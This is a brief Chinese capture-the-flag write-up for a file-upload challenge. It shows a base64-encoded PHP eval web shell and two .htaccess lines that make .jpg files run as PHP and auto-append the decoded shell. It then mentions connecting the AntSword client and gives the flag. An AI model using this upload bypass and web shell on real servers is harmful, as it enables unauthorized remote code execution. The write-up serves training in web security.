[Dest0g3 520迎新赛]funny_upload

打开靶机抓包发现过滤代码

发现.htaccess能上传后传入图片马

发现内容对  编码为：PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4=
在.htaccess文件中进行解码 加入下面内容

1. AddType application/x-httpd-php .jpg
2. php_value auto_append_file "php://filter/convert.base64-decode/resource=1.jpg"

复制代码

连接蚁剑查找flag
flag{cc9f0654-9bb1-4de8-9c4b-0d9f8af1d60d}

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。